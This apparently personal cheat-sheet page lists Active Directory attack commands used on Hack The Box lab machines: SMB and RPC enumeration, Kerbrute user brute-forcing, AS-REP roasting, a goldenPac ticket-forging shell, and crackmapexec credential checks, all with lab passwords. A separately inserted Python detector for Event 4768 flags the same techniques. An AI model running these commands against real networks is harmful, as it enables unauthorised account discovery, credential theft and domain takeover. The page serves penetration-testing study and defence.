l33t-En0ugh

Active Directory

Active Directory Tools and Stuff

smbclient

The smbclient utility is the Swiss Army knife of Linux-to-NT tools. This command lets you send messages to workstations, display browse lists and connect to SMB shares.

smbmap -H 10.129.148.199
smbclient -N -L //10.129.148.199
smbmap -H 10.10.10.52 -u james -p 'J@m3s_P@ssW0rd!'

rpcclient

rpcclient is a tool for executing client side MS-RPC functions.

Anonymous login

rpcclient -U '' -N 10.129.148.19 # -N for no password, -U for username

Login with credentials

$ rpcclient -U htb.local/james 10.129.148.199
Enter HTB.LOCAL\james's password: 
rpcclient $> enumdom
enumdomains    enumdomgroups  enumdomusers   
rpcclient $> enumdom
enumdomains    enumdomgroups  enumdomusers   
rpcclient $> enumdomusers
user:[Administrator] rid:[0x1f4]
user:[Guest] rid:[0x1f5]
user:[krbtgt] rid:[0x1f6]
user:[james] rid:[0x44f]
rpcclient $>

Kerbrute

A tool to quickly bruteforce and enumerate valid Active Directory accounts through Kerberos Pre-Authentication

./kerbrute userenum --domain htb.local /usr/share/seclists/Usernames/xato-net-10-million-usernames.txt --dc 10.10.10.52

Impacket-Tools

sudo apt install python3-impacket

To connect to MSSQL

impacket-mssqlclient 'admin:m$$ql_S@_P@ssW0rd!@10.129.148.199'

Dump a list of AS-REP roastable users using valid credentials with GetNPUsers

impacket-GetNPUsers 'htb.local/james:J@m3s_P@ssW0rd!' -dc-ip 10.129.148.199
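The two Kerberos techniques above (Kerbrute user enumeration and AS-REP roasting with GetNPUsers) both leave traces in Windows Security Event ID 4768 on the domain controller. The following is an added detection example, not code from this page or from either tool: it parses constructed 4768-style records (client IP, account, result status, pre-authentication type, ticket encryption type; the whitespace layout is an assumption, not the Windows export format) and flags a source requesting TGTs for many unknown principals (status 0x6, KDC_ERR_C_PRINCIPAL_UNKNOWN) or obtaining a TGT with no pre-authentication and RC4 (type 0x17), the usual AS-REP roasting signature.

```python
from collections import defaultdict

# Constructed sample records modelled on Event ID 4768 fields:
# client IP, account name, result status, pre-auth type, ticket encryption type.
# Not real log data; the "-" marks fields a failed request leaves empty.
SAMPLE_4768 = """\
10.10.14.7 qqqadmin 0x6 - -
10.10.14.7 backup01 0x6 - -
10.10.14.7 svc-sql 0x6 - -
10.10.14.7 jsmith 0x6 - -
10.10.14.7 helpdesk 0x6 - -
10.10.14.7 james 0x0 2 0x12
10.10.10.3 james 0x0 2 0x12
10.10.10.3 jamse 0x6 - -
10.10.14.7 svc-backup 0x0 0 0x17
"""

def parse_4768(text):
    """Turn the constructed whitespace-separated records into dicts."""
    rows = []
    for line in text.splitlines():
        ip, user, status, preauth, etype = line.split()
        rows.append({"ip": ip, "user": user, "status": status,
                     "preauth": preauth, "etype": etype})
    return rows

def detect(events, enum_threshold=5):
    """Return suspected enumeration sources and AS-REP roastable TGT grants."""
    unknown_by_ip = defaultdict(set)   # ip -> distinct unknown principals
    asrep = set()
    for ev in events:
        if ev["status"] == "0x6":      # KDC_ERR_C_PRINCIPAL_UNKNOWN
            unknown_by_ip[ev["ip"]].add(ev["user"])
        elif (ev["status"] == "0x0" and ev["preauth"] == "0"
              and ev["etype"] == "0x17"):   # TGT issued with no pre-auth, RC4
            asrep.add((ev["ip"], ev["user"]))
    # A single unknown name is usually a typo; many from one source is a scan.
    enumeration = {ip: sorted(u) for ip, u in unknown_by_ip.items()
                   if len(u) >= enum_threshold}
    return {"user_enumeration": enumeration, "asrep_roasting": sorted(asrep)}

if __name__ == "__main__":
    print(detect(parse_4768(SAMPLE_4768)))
```

Kerberos Authentication Service auditing must be enabled on the DC for 4768 to be logged at all; 10.10.10.3's single mistyped name stays below the threshold, while 10.10.14.7 is flagged for both patterns.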

Getting a shell with forged Kerberos tickets (covered in HTB-Mantis)

impacket-goldenPac 'htb.local/james:J@m3s_P@ssW0rd!@mantis'

Crackmapexec

crackmapexec is a post-exploitation tool that helps automate assessing the security of large Active Directory networks.

Checking whether a set of credentials is valid over SMB

crackmapexec smb 10.129.148.199 -u 'James' -p 'J@m3s_P@ssW0rd!' 


Last updated 2 years ago

Documentation:

https://github.com/ropnop/kerbrute
https://github.com/byt3bl33d3r/CrackMapExec
https://mpgn.gitbook.io/crackmapexec/